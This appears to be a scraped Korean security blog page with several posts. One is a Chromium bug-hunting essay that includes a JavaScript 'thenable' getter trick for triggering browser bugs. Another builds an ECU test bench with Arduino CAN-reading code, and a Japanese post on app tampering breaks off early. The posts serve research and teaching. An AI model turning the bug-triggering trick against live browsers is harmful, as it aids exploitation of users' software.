+ +바둑에서는 초반에 돌을 두는 방법들을 총칭하여 포석이라한다. 이는 대국 중반부터 게임을 이끌어나가기위한 중요한 열쇠이기때문에 신중하게 두곤한다. 나도 버그헌팅을 처음 시작할때 좋은 포석을 두기위해 많은 고민을 했다. 먼저 나의 장점과 단점을 생각해보았다. CTF을 할때부터 나는 리버싱실력이 다른 동기들에 비해 수준이하였지만 취약점은 나름 빠르고 쉽게 찾았던거 같았다. 그래서 리버싱이 비교적 많이 필요한 클로즈소스 소프트웨어보다 소스코드가 공개돼있는 오픈소스 소프트웨어를 타겟으로 하기로 마음먹었다.
+ +오픈소스는 상당히 진입장벽이 높았다. 대게 버그바운티를 하는 오픈소스들은 많은 해커들의 타겟이 되어왔고 이미 많은 취약점들이 발견됐다. 그 중 웹브라우저는 레드오션 그 자체였다. 하지만 그 만큼 부와 명예가 따르고 있었기때문에 나의 첫 취약점을 웹브라우저 취약점으로 멋있게 장식하고 싶었다.
+ +웹브라우저는 대표적으로 Firefox, Safari, Chrome, Edge가 있다. 그 중 Edge는 현재 Chromium 코드를 사용하지만 내가 버그헌팅을 시작했을때는 Mshtml과 ChakraCore엔진을 사용하고있었다.
+ +FireFox와 Chrome은 다른 브라우저보다 최신 Web Platform 기능들을 빨리 적용하는 특징이 있었다. 또한 Chrome의 경우 다양한 레퍼런스가 Public하게 제공되어서 전체적인 아키텍처를 이해하는데 많은 도음을 받을수있었다. 이러한 이유때문인지 Chrome은 많은 버그들이 제보되어왔고 지금은 Critical한 버그들이 많이 줄어든 상태이다. 흔히들 난공불락이라고도 부른다.
+ +
하지만 버그바운티 금액이 상당히 높기때문에 해볼만한 도전이라고 생각했다. 그리고 앞서 말했듯이 공개된 레퍼런스가 많아서 혼자 학습하는데 좋은 조건이였다.
+ +CTF를 하다보면 문득 고등학교때 수학문제를 푸는 상황이 연상될때가 있다. 정해진 답이 있고 필요한 것은 연필, 지우개만 있으면 됐다. CTF도 마찬가지로 시스템해킹문제가 나오면 문제바이너리를 실행할수있는 VM환경과 리버싱을 위한 IDA 하나면 충분했고 출제자의 “의도”대로 취약점을 찾으면 됐다.
+ +하지만 버그헌팅은 달랐다. 출제자의 의도라는건 애초에 존재하지않고 CTF보다 비교도 안되게 큰 리얼월드 바이너리를 편하게 분석할 수 있는 환경을 만드는것이 보기보다 어려운 작업이였다.
+ +내 타겟은 크로미움이였고 매우 큰 오픈소스 프로젝트이기때문에 필연적으로 분석할수있는 충분한 성능의 데스크탑이 필요하였다.(성능이 안좋을경우 생각보다 빌드시간이 많이 낭비된다)
+ +빌드환경 구축은 구글에서 충분히 자세하게 문서로 정리되어있었다. (해당 문서가 생각보다 길어보일수있는데 유용한 팁들이 많이 적혀있으니 꼼꼼히 읽어봐야한다. 예를 들어 빌드시간을 단축할수있는 팁)
+ +처음에는 빌드하기도 어려웠고 디버깅하기도 어려웠다. 하지만 여러가지 시행착오를 겪으며 노하우가 생기고 나에게 맞는 환경을 구축할 수 있게되었다.
+ +(빌드, 디버깅, Exploit 개발 환경을 효율적으로 구축하는 것도 실력이고 자산이라는 것을 알게되었다.)
+ +Chromium의 Attack Surface는 대표적으로 자바스크립트 엔진인 v8과 Web Platform엔진인 Blink가 있다. 나의 경우 2017년에 ChakraCore엔진을 본 경험이 있어서 V8를 먼저 보기로하였다. 지금 생각해보면 이 선택이 지금까지 Chromium에서 취약점을 찾는데에 있어서 좋은 기반을 쌓게해준거 같다. (웹브라우저의 원격 취약점들은 다양한 컴포넌트들이 있지만 대부분 Javascript로 Trigger한다. 이 때문에 javascript 엔진을 정확히 이해하는것은 많은 도움이 된다.)
+ +Fuzzing 은 정말 매력적인 기법이다. 이미 많은 해커들이 Fuzzing을 해왔고 지금 이 순간에도 취약점들이 찾아지고있을것이다. 누구나 버그헌팅을 시작할때 Fuzzer를 만들어볼까라는 생각이 해보았을것이고 나도 그런 생각을 많이 했다. 하지만 과연 내가 지금 Fuzzer만들어서 의미있는 결과를 만들수 있을까?라는 생각이 더 지배적이였다. 물론 창의적인 Fuzzing Idea를 생각해내면 좋은 결과가 나왔었겠지만 나는 뭐 딱히 좋은 아이디어가 생각나지 않았다. 그래서 좋은 아이디어가 생각날때까지 Fuzzing을 사용하지않고 소스오디팅을 하기로하였다. (아직까지도 소스오디팅을 하고 있다..)
+ +처음에는 무작정 코드를 읽었고 6개월이상동안 열심히 하였지만 취약점을 하나도 못찾았다. 이 일을 겪은 후 난 무작정 소스오디팅으로 찾는건 비효율적이라는것을 깨달았다. 오래전부터 Javascript대상으로 Fuzzing연구들이 많이 되어왔기때문이다. 이 깨달음은 별거없어보이지만 내 버그헌팅에 있어서 큰 전환점이 되었다.
+ +이후 난 Fuzzing과의 싸움에서 이길수 있는 방법을 계속해서 고민했고 여러가지 시행착오를 거쳐 몇가지 결과를 도출해냈다.
+ +v8 코드와 열심히 싸우는 도중에 우연히 Project Zero 블로그에서 글 하나를 보게되었다. 내용은 대충 WebAssembly 취약점에 관한 것이였다. 버그 클래스들은 딱히 흥미로운게 없었다.하지만 난 WebAssembly의 미래와 관심도(?)를 유심있게 보았다. 내가 왜 이러한 생각을 한 것인지 이해하려면 꽤 오래전으로 거슬러 올라가야한다.
+ +2016년, ChakraCore가 처음으로 공개되었을때 취약점이 아주 많이 발생했다. 대게 ECMAScript6 와 관련된 취약점이였다. 왜 이런 취약점이 많이 발생했을까? 물론 ChakraCore가 릴리즈된지 얼마안돼서 그런것 일 수 도 있다. 하지만 근본적인 문제는 ECMAScript 6 표준 구현이라고 생각한다. 표준을 코드로서 구현하는것은 매우 어려운일이다. V8, SpiderMonkey, JavascriptCore들은 ECMAscript라는 같은 표준을 사용하지만 구현코드를 보면 전혀 다르다. ChakraCore는 릴리즈된지 얼마되지도 않았을뿐만 아니라 ECMAScript 6도 Draft가 끝난지 얼마 안된상태에서 구현을 했기때문에 매우 불안정한 상태였을것이다. 이는 ChakraCore의 수많은 취약점들이 증명해준다.
+ +난 이 상황이 WebAssembly에도 적용될것이라고 생각했다. WebAssembly또한 ECMAscript처럼 표준이 존재하며 현재 많은 기능들이 추가되고 있다. 무엇보다 V8과 SpiderMonkey는 다른 Javascript엔진들보다 훨씬 빨리 표준을 구현하고있다. 표준이 구현된지 얼마 안되었고 계속해서 개발되고있기때문에 분명히 취약점이 있을거라고 확신했다.
+ +또한 WebAssembly 취약점에 대한 조사를 하던도중 흥미로운 것을 발견하였다. The Problems and Promise of WebAssembly 포스팅은 2018.8에 작성되었고 10개 남짓한 Webassembly 취약점들은 2018 ~ 2017 사이에 발견되었다. 이 말은 2018년 이후 WebAssembly 취약점이 발견되지 않았다는것이다. 위에서 언급했듯이 WebAssembly는 활발히 개발되고있었기때문에 2018년 이후에 새로 나온 기능들이 상당히 많았다. 이 기능들은 아직 해커들에게 관심을 못했기때문에 충분한 블루오션이였다.
+ +나의 첫번째 두번째 취약점은 WebAssembly에서 나왔고 위 전략이 효과적이었다는것을 증명해준다.
+ +나의 첫 취약점, issue 964607 는 WebAssembly Reference Table 구현 코드에서 발생했다. 이 기능은 활발히 개발중(experimental)이였기때문에 보안성이 매우 떨어진 상태였다. 리포트를 보면 알 수 있듯이 취약점 자체는 매우 쉽고 간단했다. 하지만 우리는 여기서 취약점의 복잡성, 창의성보다는 이 취약점이 어떻게 기인되었는지를 주목해야한다.
+ +WebAssembly는 초기에 Function Table만 있었지만 Any Reference Table이 새로 생기게되었다. 이러한 객체 타입의 확장은 이전기능과 새로운 기능 구현 코드들이 필연적으로 병합된다. 기존에 구현된 코드에서 사용된 모듈들은 새로 추가된 기능들에 맞춰 변화해야 될 수 도있다. 이 과정에서 예기치 못한 상황이 발생될수있다. 예를 들어 배열 길이의 증가, 배열 타입 변형, User callback(side effect) 등이 있다. issue 964607 는 변화한 배열 길이의 증가를 예상하지 못해 발생했다.
+ +두번째 취약점(issue 980475)도 WebAssembly Reference Table과 관련이 깊다. 첫 취약점과 다른점이 있다면 WebAssembly의 새로운 기능인 bulk memory와도 관련이 있다는것이다. 이 취약점 역시 새로 추가된 기능이 기존 모듈에 영향을 줄 수 있다는 것을 예상하지못해 발생했다.
+ +나의 데뷔전은 이렇게 마무리가 되었다. 비록 Stable이 아닌 experimental 취약점들이여서 CVE는 못 받았지만 이것으로 인해 많은 성장을 이루었다는것은 확실하다.(Stable이 아니여도 포상금을 똑같이 받을수있다!)
+ +
수험생 시절 역사 선생님들이 항상 하시던 말이 있었다. 역사는 반복된다. 전 세대에 있었던 일이 현 세대에도 일어날수 있다는 말이다. 1-day 취약점들을 조사하면서 이 말이 버그에 적용될수도 있다는 생각이 들었다.
+ +Issue 782145는 2017년 11월에 발생한 취약점이다. RegExp 객체는 fast type과 slow type이 존재한다. Replace함수는 인자로 RegExp 객체를 받을 수 있는데 타입에 따라 함수 Flow가 달라진다. 하지만 해당함수에서는 타입을 적절하게 검사하지 못하여 Type Confusion이 일어날수 있었다.
+ +다음은 pwn2own 2019에서 사용된 Issue 944971이다. 해당 취약점은 Issue 782145와 매우 유사하였다. poc코드를 보면 더욱 비슷해보일뿐만 아니라 Root Cause도 같은 패턴이었다. 마치 생명주기를 보는듯 했다. 이와 비슷한 현상을 갖는 취약점들은 한 두개가 아니였다.
+ +이로부터 내가 얻은 교훈이 있었다.
+ +1-day 분석은 전체적인 코드의 흐름뿐만 아니라 미래의 다시 나올 취약점에 대비를 할수있다.
+안전했던 코드도 첨삭을 통해 다시 취약해질수 있다.
+WebAssembly 취약점을 찾은후 학교생활을때문에 몇달간 버그헌팅을 못했다. 2020년 2월부터 다시 시작했는데 이때는 Chrome Mojo(Sandbox Escape 취약점) 붐이 일어나고 있었다. 원래 Javascript 취약점을 다시 찾고싶었지만 트렌드에 따라 Mojo 취약점을 보기 시작했다.
+ +Mojo에 관련된 레퍼런스들은 생각보다 많았고 Mark Brand와 Man Yue Mo가 찾은 Mojo 취약점들은 아주 많은 도움이 됐다. Mojo를 공부한지 한달이 됐을 무렵에 소스오디팅을 시작했다. Mojo붐은 이미 1년넘게 지속된지라 블루오션에서 레드오션으로 변화되는 시점이였다. 지푸라기라도 잡고싶은 심정으로 코드를 주구장창 보았다. 하지만 2주넘게 수확이 없었다.
+ +포기 할 때 쯤 우연히 한 커밋을 보았다. 이 커밋은 내가 1주전에 보았던 WebSocket Mojo Service 부분이였고 몇몇의 함수을 추가하는 커밋이었다.
+ +처음에는 별 생각 안하고 리뷰를 했지만 이 커밋으로 인해 전에는 없었던 UAF 취약점이 일어날수 있다는것을 인지하는데 그리 많은시간이 걸리지 않았다. 난 이 취약점을 발견하고 나서 꾸준히 커밋을 보는 습관이 생겼다. 이 습관은 향후 내 버그헌팅 삶의 많은 발전을 기여했다. 버그헌팅을 부업으로 삼고있는 사람에게 딱 한개의 조언을 할 수있다면 난 무조건 커밋 읽는 습관을 들이라고 말 할 것이다.
+ +때때로 취약점은 작은 커밋 하나로 기인 될 수 있다.
+ +스타크래프트에는 다양한 치트키가 있다. Show me the money라고 치면 미네랄과 가스를 얻을 수 있고 Power Overwhelming를 치면 무적이 될 수 있다. 버그헌팅에는 당연히 치트키가 없다. 하지만 비슷한 것은 있다! 바로 버그클래스다. 좋은 버그 클래스를 발견하면 그것 하나로도 상당히 많은 취약점을 찾을 수 있다. 나도 몇개의 버그 클래스로 많은 재미를 봤다.
+ +좋은 버그 클래스는 무엇일까? 난 두 가지 조건이 필요하다고 생각한다.
+ +다른 해커는 모르고 나만 아는 버그 클래스이다.
+개발자는 모르고 해커만 인지하고 있다.
+사실 첫번째 조건이 충족되면 두번째 조건도 충족될것이다. 하지만 두번째 조건만 충족해도 많은 재미를 볼 수 있을것이다. 버그클래스가 한번 리포트되면 해커들에게 알려지는건 시간문제이고 다른해커들이 찾기전에 내가 더 빨리 찾으면 된다.
+ +Issue 931640 리포트를 보면 재밌는 트릭이 있다.
+ +Object.prototype.__defineGetter__("then", function() {
+
+ if (++then_counter == 1) {
+
+ controller.close();
+
+ performMicrotaskCheckpoint();
+
+ }
+
+ });
+이 트릭은 2016년 UXSS 취약점에서 기인한 트릭이다.
+ +var thenable = {get then() { console.log(2); }}
+
+console.log(1); Promise.resolve(thenable); console.log(3)
+Promise.resolve는 인자로 오브젝트를 받으면 then이라는 property를 가져온다. 이때 유저는 getter를 사용하여 then를 가져올때 user-defined function를 실행할수있다. 아마 이 글을 읽고있는 대부분의 독자분들은 몰랐을것이다. 보통의 개발자들도 이러한 스펙을 알지 못했을것이다. 이러한 side effect는 많은 취약점을 야기 시킬 수 있다.
+ +내가 이 Thenable Object 트릭을 인지하고 찾기 시작했을때는 다른 해커들이 별로 관심을 갖지않고 있었다. 덕분에 많은 취약점을 찾을 수 있었다. 하지만 3~4달후에 해커들이 해당 트릭을 인지하고 많은 버그들이 Kill 되어버렸다…
+ +재미를 본 또다른 버그클래스는 render_frame_host라는 raw pointer의 lifetime 문제였다. 이 클래스는 Plaid CTF 문제로 출제되었다. 이로인해 해커들에게 많은 관심을 받게되었다. 그래서 난 빠르게 취약점을 찾아 바로바로 신고하였다.
+ +앞서말한 좋은 버그 클래스의 조건중에서 첫번째 조건을 만족 시키는것은 매우 어려운 일이다. 그렇기때문에 이미 공개된 버그클래스를 선별하여 빠르게 찾는게 더 효율적인 방법이라고 생각한다.
+ +크롬에서 버그헌팅을 하다보면 정식버전(stable)이 아닌 취약점을 찾을때가 많다. 솔직히 버그를 찾는 입장에서 Stable취약점을 찾아 CVE credit을 받고 싶을것이다.(stable이 아니면 CVE Credit안줌) 그래서 이러한 취약점을 찾았을때 난 가끔 초읽기를 한다. 크롬은 보통 한달마다 버전업을 한다. 스케쥴이 엄청 체계적이며 베타, 개발자 버전에서 많은 취약점들이 제거된다. 때문에 자신의 취약점이 정식버전으로 되는것은 여간 쉬운일이 아니다. 버그 초읽기를 하는건 정말 스트레스를 받는 일 이었다. 이제는 내 버그가 정말 찾기 어려운 버그인지 자가진단을 하고 초읽기를 하는 편이다.
+ +나의 진단법은 chrome release security update를 보는것이다. 크롬은 일주일마다 보안업데이트를 하는데 그 주에 패치된 버그들의 ID를 공개해준다. 이를 통해 패치된 버그의 Root Cause를 분석하여 버그클래스를 알아낼수있다.
+ +버그클래스들은 유행를 타기 때문에 내가 찾은 버그와 같은 클래스라면 초읽기를 그만두고 신고해야한다.
+ +Chrome Platform Status 사이트에서 크롬 릴리즈 스케쥴을 확인할수있다. 이것을 보고 기도를 하자
+ +버그헌팅을 시작한지 2년차가 되어서야 실적이 조금씩 생기기 시작했다. 난 남들처럼 재능이 있는 해커가 아니었기때문에 코드를 “읽는다” 라는 것보다는 “익숙해진다”라는 느낌으로 해왔던거 같다. 매일매일 아침을 먹으며 코드와 커밋을 보니 이해가 안되던 크롬 아키텍처가 조금씩 익숙해졌다. 구조가 익숙해짐으로써 코드를 빠르게 읽어갈수있게되었고 취약점이 보이기 시작했다.
+ +내가 버그를 찾았던 순간은 잠을 줄여가며 코드를 보던 밤이 아니라 편안한 숙면을 취하고 간단하게 코드를 리뷰하던 아침이었다. 버그헌팅은 CTF처럼 짧은 시간에 끝내는 놀이가 아니였다. 멀리보며 꾸준히 코드를 읽는게 중요하다는 것을 깨달았다.
+ +물론 내가 부족했던점도 있었다. 레퍼런스들을 잘 보지 않았다는 것이다. 때때로 코드에서는 수천줄을 읽어야 되는 것을 레퍼런스 한개만 읽어도 이해되는 구조가 몇몇 있었다. 이러한 시행착오를 격고 최근에서는 레퍼런스를 열심히 읽는중이다.
+ +이 글은 오로지 저의 생각이며 정답이 아닙니다. :D
+ +
+
+
+
+
+ 
+ 서영일
+ 최근 자동차 해킹에 대해 관심을 가지는 사람들이 늘고 있다. 워낙 차를 좋아해서 기회가 생기면 자동차 해킹을 해봐야겠다고 생각했었는데 마침 기술 블로그에 기고할 차례가 되어 글을 쓰게 되었다.
+ +아무거나 다 해볼 수 있는 차가 있었으면 좋았을 것이다. 그러나 타고 다닐 차를 실습용으로 쓰기엔 불안하고, 그렇다고 실험용 차를 따로 구매하는 건 꽤 부담스럽다. 게다가 자동차 해킹 실습하는데 철판이나 바퀴 같은 게 필요한 건 아니니까 새로운 방법을 써보자!
+ + |
+
|---|
| 사실 자동차는 꽤나 비싼 물건이다…. | +
ECU를 활용하면 좋을 것이다. 자동차와 관련된 연산은 대부분 ECU에서 이뤄지기 때문이다. 그러한 고로, 이번 글에서는 ECU를 활용한 해킹 테스트 환경을 구성해본다.
+ + |
+
|---|
| 출처 : https://images.app.goo.gl/PRsNPqiKFuc95ni66 | +
ECU는 전자제어유닛(Electronic Control Unit)의 약자로 자동차에서 필요한 각종 연산을 수행하는 일종의 컴퓨터이다. 과거에는 엔진제어유닛(Engine Control Unit)의 의미로만 사용되었으나 차량의 전자화가 이뤄지면서 다양한 모듈에서 전자제어가 사용되어 전자제어장치들을 모두 통칭할 때 사용하게 되었다. 최근에는 엔진 제어 유닛을 ECM(Engine Control Module) 이라고 부르며 TCU, BCM 등 다양한 유닛이 차량에 탑재되고 있다.
+ +ECU 테스트 벤치를 만들기 위해 ECU를 구매해보자.
+ +필자가 구매한 물건은 17년식 아반떼(AD) 1.6 GDI A/T에 탑재되는 ECU(39110-2BAZA)이다.
+ +요즘 차량들은 모두 ECU를 가지고 있기 때문에 어떤 차종을 선택하더라도 무관하지만, 차종이 동일하더라도 차량 형식이 바뀔 때에는 새로운 코드명을 부여받는다. 예를 들어 쏘나타는 1986년 이래로 지금까지 계속 “쏘나타”였지만 형식에 따라 코드명은 Y2, Y3, EF, NF, YF, LF, DN8로 바뀌어왔다. 차량 형식이 바뀔 때는 통상적으로 부품이 많이 바뀌기 때문에 이 부분을 반드시 확인해야 한다.
+ +연식에 따라 ECU 모듈이 바뀌는 경우는 흔하지 않지만 차후 분석에서 중요한 힌트가 될 수 있고, 간혹 연식변경 모델에서 전장 구성이 바뀌는 경우도 있기 때문에 알아둘 필요가 있다.
+ +같은 차종이더라도 여러 엔진 형식이 존재할 수 있으며, 엔진 형식에 따라 다른 ECU를 사용할 수도 있다. 예를 들어 분석에 사용되는 17년식 아반떼는 가솔린 2종(감마 1.6 T-GDI, 감마 1.6 GDI), 디젤 1종 (U-II 1.6 VGT), 총 3종류의 엔진 형식이 존재한다. 점화플러그를 사용하지 않는 디젤의 경우 엔진의 부품 구성이 달라지기 때문에 ECU 구성이 바뀔 가능성이 높다. 따라서 구매 전 엔진 형식을 알아두어야 한다.
+ +변속기 형식(자동/수동/DCT 등)에 따라 ECU가 달라지기 때문에 변속기 유형에 대해서도 알아두어야 한다.
+ + |
+
|---|
| 출처 : 현대모비스 부품정보검색 | +
신품을 구매하면 좋겠으나 가격이 다소 부담스럽다. 실험에 사용하는 목적이라면 중고를 구매해도 무관하다. 인터넷 쇼핑몰이나 gparts 등에서 중고 ECU를 구할 수 있다.
+ + |
+
|---|
| 신품 가격으로 3개 쯤 살 수 있다… 🤔 | +
신품에 비해 저렴한 가격으로 판매중인 것을 확인할 수 있다. 일부 판매점에서는 ECU와 연결되는 커넥터도 같이 판매하는 경우가 있으므로 판매점에 확인하여 함께 구매하는 것을 추천한다. 커넥터가 있는 경우 케이블을 연결하기 훨씬 쉬워진다.
+ +ECU 핀들을 보면서 속이 복잡해지겠지만 걱정하지 않아도 된다. 현대/기아 차량은 정비를 위한 기술정보 사이트 GSW를 제공하고 있다. GSW를 통해 차량 전장회로도, ECU 커넥터 정보 등을 확인하여 연결하면 된다.
+ + |
+
|---|
| [회로도-엔진 전장-엔진 컨트롤 회로(A/T)] | +
회원가입 후 [전장회로도 - 모델 선택 - 연식 선택 - 엔진]을 선택한 후 원하는 회로를 선택하면 된다 (ex. 전장회로도 - 아반떼(AD) - 2017 - G 1.6 GDI) 참고할 사람을 위해 상세 메뉴를 표시해두겠다. 상세 메뉴는 차종에 따라 차이가 있을 수 있다.
+ + |
+
|---|
| 커넥터(C100-AK) 단면도 | +
실험에 사용되는 ECU(39110-2BAZA)는 2가지 종류의 커넥터가 필요하지만 이번에 사용할 핀들은 C100-AK 커넥터 하나에 모두 모여있다. 단자에 맞는 커넥터가 없는 경우에는 직접 납땜을 해야한다. 필자는 커넥터를 못 구했기 때문에 핀의 크기가 큰 1~6번 핀은 납땜으로 연결하고, 좌측 핀은 흔히 볼 수 있는 CH254(아두이노 등에 흔히 사용되는 소켓) 소켓 케이블로 연결했다.
+ + |
+
|---|
| [커넥터 정보-컨트롤 하네스-회로도] | +
C-CAN, CCP-CAN 통신을 위한 High/Low 핀, 전원 및 접지 핀에 케이블을 연결한다. 여기서 주의할 점은 커넥터의 배선이기 때문에 좌우가 반대라는 것이다. 그림이 좌우로 뒤집어졌다고 생각하고 작업해야 올바른 위치에 연결할 수 있다
+ + |
+
|---|
| ‘연결만 되면 됐지’ 같은 마감 상태 | +
필요한 모든 선을 ECU에 연결했다면 전원을 공급해야 한다. ECU에 필요한 전압은 GSW에서 확인할 수 있다.
+ + |
+
|---|
| [정비지침서-아반떼(AD)-2017-G 1.6 GDI-엔진 제어/연료 시스템-엔진 컨트롤 모듈(ECM)-회로도] | +
전압은 시동 시 배터리 전압을 따른다고 나와있으므로 자동차 배터리 전압인 12V를 공급하면 된다. 구체적인 요구사항과 신호명 각 항목에 대한 자세한 내용을 알고 싶다면 회로도-엔진 전장-엔진 컨트롤 회로(A/T)-서비스 팁을 참고하면 된다.
+ +12V를 공급하는 방법은 여러가지가 있지만, 쓰지 않는 컴퓨터 파워서플라이를 가져와서 전원 공급에 사용하는 방법도 있다.
+ + |
+
|---|
| [파워 서플라이 전원 정보] | +
가지고 있는 파워서플라이를 확인해보니 12V/18A 전원을 지원하는 것을 확인할 수 있다. 연결해보니 동작하는 데 크게 이상은 없었다. 대강 요구사항에 맞으면 파워서플라이 케이블을 잘라내고 작업을 시작해보자. 작업 직전에 파워서플라이를 사용한 적이 있다면 캐패시터를 충분히 방전시키는 것을 잊지말자
+ + |
+
|---|
| 파워서플라이에는 고전압이 흐르고 있다. 작업에 유의하도록 하자 | +
 |
+
|---|
| 출처 : https://www.smpspowersupply.com/connectors-pinouts.html | +
그림은 ATX 파워서플라이 단자의 배치도이다. ECU에 전원을 공급하기 위해 파워서플라이의 12V 핀, 그리고 PS_ON(16번), 15번 COM이 필요하다. 12V 직류 전원을 제공하는 포트는 노란색 중 하나를 사용하면 되고, 접지는 검은색을 사용하면 된다. PS_ON은 파워서플라이의 시작을 위해 사용되는 핀으로 15번 COM과 쇼트 시켜주면 된다. PS_ON을 쇼트시켜주지 않으면 파워서플라이가 켜지지 않는다.
+ +CAN 데이터를 송/수신하기 위해 아두이노를 사용한다. 데이터가 많이 쌓이면 아두이노가 먹통이 되는 경우가 잦아 라즈베리 파이를 추천하지만 아두이노를 쓰는 편이 더 쉽기 때문에 이번 게시글에서는 아두이노를 이용한 방법을 소개한다.
+ + |
+
|---|
| 비싸서 못 사는 게 아니고 배송비 2,500원이 뼈 아프다 | +
아두이노가 CAN 통신을 하도록 하기 위해서는 CAN 모듈이 필요하다. 많은 비싼 모듈이 있지만 이정도 제품이면 크게 문제되지 않는다. 아두이노와 MCP2515 모듈은 다음과 같이 연결한다.
+ +| MCP2515 | +Arduino | +
|---|---|
| VCC | +5V | +
| GND | +GND | +
| INT | +DIGITAL 2 | +
| CS | +DIGITAL 9 | +
| SI | +DIGITAL 11 | +
| SO | +DIGITAL 12 | +
| SCK | +DIGITAL 13 | +
MCP2515를 사용하기 위해 라이브러리(https://github.com/Flori1989/MCP2515_lib)를 설치한다.
+ +다시 한 번 강조하지만, 작업 전 파워서플라이의 전원을 제거하고 방전될 때까지 충분한 시간이 지난 후 작업해야한다.
+ + |
+
|---|
| 파워서플라이 DC 12V 열수축튜브 작업 | +
안전하고 깔끔한 배선 작업을 위해 다이소에서 1000원에 구할 수 있는 열수축튜브를 사용했다. 브레드보드에서 작업하기 위해 전선을 자르고 CH254 소켓을 연결했다. 이후 CAN Shield, ECU 전원들을 브레드보드에 구성했다.
+ + |
+
|---|
| 브레드보드 구성 사진 | +
구성에 대한 이해를 돕기 위해 그림을 준비했다.
+ + |
+
|---|
| 전체 회로도 | +
파워서플라이에서 12V, GND, PS_ON 핀을 따오고, ECU와 이어지도록 작업한다. PS_ON은 GND와 따로 이어지도록 구성해줘야 한다. ECU 전원 및 접지는 파워서플라이의 전원, 접지에 바로 이어져도 상관없다. ECU와 CAN은 HIGH, LOW를 그대로 이어주고, 아두이노와 CAN Shield는 이전 단원에서 다뤘던 그대로 이어주면 된다.
+ +전원부를 직접 연결하는 것이 부담된다면 안정적인 동작을 위해 회로의 퓨즈 용량에 맞게 전원부에 회로를 구성하는 것도 좋다. 회로의 퓨즈 용량은 GSW의 회로도 [회로도-엔진 전장-엔진 컨트롤 회로(A/T)-회로도]에서 확인할 수 있다. 다만 이번 글의 목표는 단순히 ECU에서 신호가 잘 출력되는지를 확인하는 것이므로 별도의 회로를 구성하지는 않았다. 이는 다음 편에서 다루겠다.
+ +#include <mcp_can.h>
+#include <SPI.h>
+long unsigned int rxId;
+unsigned char len = 0;
+unsigned char rxBuf[8];
+
+MCP_CAN CAN0(9);
+
+void setup()
+// Set CS to pin 9
+{
+ Serial.begin(115200);
+ if(CAN0.begin(CAN_500KBPS, MCP_8MHz) == CAN_OK) Serial.print("can init ok!!\r\n");
+ else Serial.print("Can init fail!!\r\n");
+ pinMode(2, INPUT); // Setting pin 2 for /INT input
+ Serial.println("MCP2515 Library Receive Example...");
+}
+void loop()
+{
+ if(!digitalRead(2))
+ {
+ CAN0.readMsgBuf(&len, rxBuf);
+ rxId = CAN0.getCanId();
+ Serial.print("ID: ");
+ Serial.print(rxId, HEX);
+ Serial.print(" Data: ");
+ for(int i = 0; i < len; i++)
+ {
+ if(rxBuf[i] < 0x10)
+ {
+ Serial.print("0");
+ }
+ Serial.print(rxBuf[i], HEX);
+ Serial.print(" ");
+ }
+ Serial.println();
+ }
+}
+MCP2515 라이브러리에 들어가있는 CAN 통신 읽기 예제 코드이다. 간단한 코드지만 ECU가 정상적으로 작동하는지 확인하는 데에는 충분하다.
+ + |
+
|---|
| 패킷이 너무 많이 나와서, 오래두면 아두이노 프로그램이 뻗는다 | +
전원을 켜면 실시간으로 많은 CAN 패킷들이 쏟아져 나오는 것을 확인할 수 있다.
+ +이제 분석을 시작하면 된다!
+ + |
+
|---|
| 테스트 환경 전체 모습 | +
이번 게시글에서는 ECU와 PC용 파워서플라이, 아두이노 그리고 간단한 배선작업을 통해 자동차 해킹을 위한 테스트 환경을 구성해보았다.
+ +
+
+
+
+
+
+ 양찬우
+ 日本のアプリケーションセキュリティー措置
+ +概要
+ +今回は日本のアプリケーションの特徴と、セキュリティ措置について確認するため、APKファイルを改ざんしたりhookingを通じてモバイル安全性を確認するいくつかのテストを行います。
+ +1。アプリの具現方法
+ +日本のアプリケーションの特徴を調べるために、日本のショッピングアプリケーションを一例として分析してみます。オンラインショッピングアプリは大体ウェブビューで具現されています。
+ +2。root化の有無を確認
+ +
+ 
+ 
+ 
+ 
+ 
+ 
.png)
+ 
+ 
+
](/assets/2023-07-31-bughunting-vulnerability-chaining/1.png)
](/assets/2023-07-31-bughunting-vulnerability-chaining/2.png)
+
+ 
